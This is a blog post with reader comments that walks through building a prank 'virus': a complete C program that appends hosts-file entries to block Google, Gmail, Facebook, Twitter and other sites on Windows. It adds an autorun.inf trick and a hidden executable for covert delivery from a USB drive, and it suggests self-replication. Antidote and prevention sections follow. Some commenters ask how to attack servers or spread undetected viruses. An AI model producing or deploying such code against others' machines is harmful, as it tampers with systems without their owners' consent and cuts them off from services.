We will make a “virus” which will block orkut, facebook, google, gmail, twitter and some others in Microsoft Windows systems. This is a very easy to code and effective one, and very good to play prank with friends. But before anything you do, please note that I will NOT be liable for any kind of damage done to any computer system or any other physical or intellectual property. You and only you are liable for everything. Sorry for the message, but i personally do not think such things will happen. To make sure such things do not happen, do not apply this to any man who does important works with the sites which are blocked and whoever you apply this upon, remember to unblock the sites shortly. The antidote is also supplied with this post.
What’s The Idea?
I am not a very good programmer or a virus maker, so the idea is very simple. The code we are going to write does not act like a virus as defined in Wikipedia and so it does not qualify, but we can call it a “virus” with the quotes on :D. Although this does the fun. There is a file named “hosts” in Microsoft Windows systems (also in other systems). The full path of this file is as below:
Microsoft Windows XP: C:\WINDOWS\system32\drivers\etc\hosts Microsoft Windows 2K: C:\WINNT\system32\drivers\etc\hosts Microsoft Windows Vista: C:\WINDOWS\system32\drivers\etc\hosts
This file contains the mapping of the IP address to the host names of the websites. That means it contains the IP address to contact for each host listed in that file. This file is loaded in the memory when Windows is started. Each line contains an IP address and next a host name. This signifies that IP address should be contacted if the corresponding host name in entered. We will map each of the hosts to IP address 127.0.0.1 or some nonexistent address like 255.255.255.255. 127.0.0.1 is the IP address of your computer (localhost).
127.0.0.1 www.google.com
After adding the above line and saving the file, relaunch the browser and when you will enter http://www.google.com it will try to connect to 127.0.0.1 , instead of querying the DNS server, and end up in the localhost and if you don’t have any webserver running it will show page cannot be displayed, essentially it will block http://www.google.com We will simply write a C Language program which opens this file and then appends the target websites in this file. If you have a webserver running then it will openup the default page of the localhost. So to make sure it doesnot go anywhere else we can add a nonexistent IP like 255.255.255.255 or 123.456.789.000 .
The above are the default paths of the “hosts” file but it might not be in every case. For example one might not have his/her Windows installation in the C: drive, or he/she might not even have a C: drive at all. And even more the Windows installation directory might have some other name. At that case the paths would change. So how can we know in what path the “hosts” file is in? We will use the Windows Environment Variable SystemRoot . This environment variable has the path to the windows installation directory stored in. So the path to the hosts file will essentially become %SystemRoot%\system32\drivers\etc\hosts . We will make use of the getenv () function in standard library stdlib.h to fetch the value of SystemRoot variable and then concatenate rest of the path to it to get the absolute path of the hosts file. As Below:
char hosts_file_path[FILENAME_MAX];
strcpy (hosts_file_path, getenv ("SystemRoot"));
strcat (hosts_file_path, "\\system32\\drivers\\etc\\hosts");
/* After these two lines "hosts_file_path" will have the absolute path to the "hosts" file */
We will use the above path to get the hosts file. This will make the code work in almost any windows installations.
To know more about the hosts file visit the below links:
The Code
Now the code, it has only three steps:
- Open the “hosts” file in append mode
- Append the line entries
- Close the file
The code is presented below:
/*
* File Name : bsit.c
* Description : A cheap code to append the hosts file
* under Microsoft Windows and block popular
* sites.
* Antidote : Remove the appended lines from the hosts
* file and save it.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int
main (void)
{
FILE *fp;
int i;
char hosts_file_path[FILENAME_MAX];
char ip[] = "255.255.255.255";
/* Add your sites in the below list. */
char *blist[] = {
"www.orkut.com",
"orkut.com",
"www.google.com",
"google.com",
"www.google.co.in",
"google.co.in",
"www.gmail.com",
"gmail.com",
"www.facebook.com",
"facebook.com",
"www.yahoo.com",
"yahoo.com",
"www.twitter.com",
"twitter.com",
"#"
};
strcpy (hosts_file_path, getenv ("SystemRoot"));
strcat (hosts_file_path, "\\system32\\drivers\\etc\\hosts");
if ((fp = fopen (hosts_file_path, "a")) == NULL)
return 0;
for (i = 0; blist[i][0] != '#'; i++)
{
fputs (ip, fp);
fputs (" ", fp);
fputs (blist[i], fp);
fputs ("\n", fp);
}
fclose (fp);
return 0;
}
Now just compile it with any compiler, like GCC, MinGW, Digital Mars, Borland, and make sure you are in Microsoft Windows environment. (Please avoid Turbo C++ v3.0). This needs to execute only once. The main drawback is you need to execute this program as administrator making this a cheap attack. But most of the general Microsoft Windows users log in as administrator.
Enhancements
Autorunning this compiled executable, from a plugged in USB flash drive will make an enhancements and more vicious. Open a text editor and enter the following code in and save the file with the name “autorun.inf” in your usb drive along the compiled exe file.
[autorun] open=compiled_file.exe
When making the inf file make sure that the extension is inf. By default in Windows the extentions are not shown. So when you save the text file as autorun.inf it will actually be autorun.inf.txt. So first show the extentions the file extensions from the Folder Options, or right click -> new -> text file and then enter the name.
And also make the exe file hidden, it can also be made read only. Further enhancements could be done making it able to replicate and spread into other connected USB flash drives or portable harddisks, but I will stop here. And ofcource adding more sites to the list will get better.
Note: The new XP update has stopped auto running feature.
Antidote
The antidote is to remove the appended lines in the file. In the worst case the executable file might have run many times and appended the same lines more than one time. To clean the mess we need to manually seek for the entries and remove, or use a pattern match program (i do not know any pattern match program in Windows). Or we would just make a backup before we append the file (do viruses take data backups of the targets?).
Prevention
To prevent this code, and also tons of codes even a lot of heavy weight ones the best way is to always use a user account with limited permission, and not the administrator account. Usage of the administrator account makes way for the majority viruses to access your system file and tamper with them. So make a normal use account and limit its permission. When surfing Internet the best is to use an account with the minimal permission. Also disable the autorun feature. This will save you from major part of attacks and cheap attacks like this one. For the heavyweight true cracker-hacker attack keep your copy of Microsoft Windows updated and the firewall on, and never use a pirated copy and convert it to a professional edition (they really never convert). We cannot make this cheap attack in GNU+Linux systems’s /etc/hosts as everyone use a non-root user to login. So as you can see windows users themselves open the doors by using the administrator to log in and make the malatious program’s work easy.
The Good Side
The hosts file is the best way To block ad sites, porn sites, and virus, malware sites. What you have to do is to add a list of bad sites in the hosts file and map it to 127.0.0.1 and you will never get into those bad sites. For a bad site listing for the hosts file click the following link and use that file. This file contains a ton of bad sites listed. The big ad-ware hi-fi software also use this file to block unwanted sites. To get a list of bad sites visit http://www.mvps.org/winhelp2002/hosts.htm
Phoxis 
Why should we avoid Turbo C++ v3.0???
Because TC is non-standard
here is the standard
Click to access c99.pdf
get a copy of this book….read it and you will find why TC is non standard
Hey neat website, just have something to ask you, what spam software you have on your site for cleaning up comments because I am getting so many spammers on my web site.
Could not understand if this comment was a spam or not, it passed the spam filter, but is not related to the content.
Whatever, this blog is hosted in wordpress.com, and all the administrations are done by wordpress.com officials. The spam filters are also maintained by them. wordpress.com uses Akismet as the spam filter, which is one of the best out there. Check out Akismet here: http://akismet.com/
hi… i have a confusion……..if i make this Virus …..will it only block sites on that particular computer or….it will block to other users as well….. like if i put this virus on a chat room……. will other users not be able to login to that particular website or its just me?
please clear this
if you read the post you will find that this is not a true virus, and simply uses the windows (linux) hosts files to block the website in one specific computer under any user. This code is only a one click solution which adds the lines in the hosts file where we specify certain domains to resolve as some invalid IP address, and thus when you enter that site, the invalid IP is found instead of a DNS looked up correct IP, and the site does not open.
You cannot do this to any chat room or else. This is more an annoying prank than a virus. I will suggest a read on the hosts file from the link provided in the post.
Quite interesting, well I just wanted some songs and got your blog. Thanks for this one mate ;) I just loved it. An additional comment or feedback which I would like to give is that this theme is quite boring and you need to work on it but everything else I fine.
cool article
I was looking for a good read covering this issue . Searching in Google I found this great site. After going over this article I’m really happy to say that I have found just what I was looking for. I will make sure to save blog and come again on a constant basis. Thanks! :-)
The hosts file is present in all UNIX-like systems. This code will work in Linux too. Just put the filesystem related parts in a #IFDEF PLATFORM_WIN32 or something.
yes definitely it will work in Linux, or other UNIX live platforms. What is needed is to simply replace the file absolute path. Like for Linux the file is “/etc/hosts” .
The main thing which the code exploits is the user negligence. The code will only work when executed in a superuser mode or equivalent mode such that the the it has proper permissions to edit the hosts file. Now generally almost all GNU+Linux users log in with a separate user account, and a very rare population (although not zero) log in as root (I don’t know why, probably they don’t know about ‘sudo’). But as far as I have seen, general Microsoft Windows users almost always logins with an administration account, so this small code can do what it wants to. ;-)
Thank for your articles.
how to make a website virus ?pls told me………….
how can i make website virus ?
probably you should study about the system internals, and networks first and become an expert, then you can start coding such things.
Does it really need to write a program?
absolutely not. it’s just a way to automate the work.
Moreover, google chrome’s loading “cached copy” feature is stopping me from fully blocking a website.
whenever the cache expires, it would be blocked. This is not actual blocking it is like pseudo block, only the names you enter would be mapped to the hosts file if the name has a corresponding entry. This is actually not a proper way of blocking. To block a site is to forbid any communications to or from a set of IP addresses, which should be specified under the router table, firewall software.
hi sir i wan to send virus to the site server and i want to finish all his work..
it is important for our country.
Probably you should contact the police cyber department. I am not a security expert or a virus programmer.
is it possible to send website viruses without being detected?? HOW??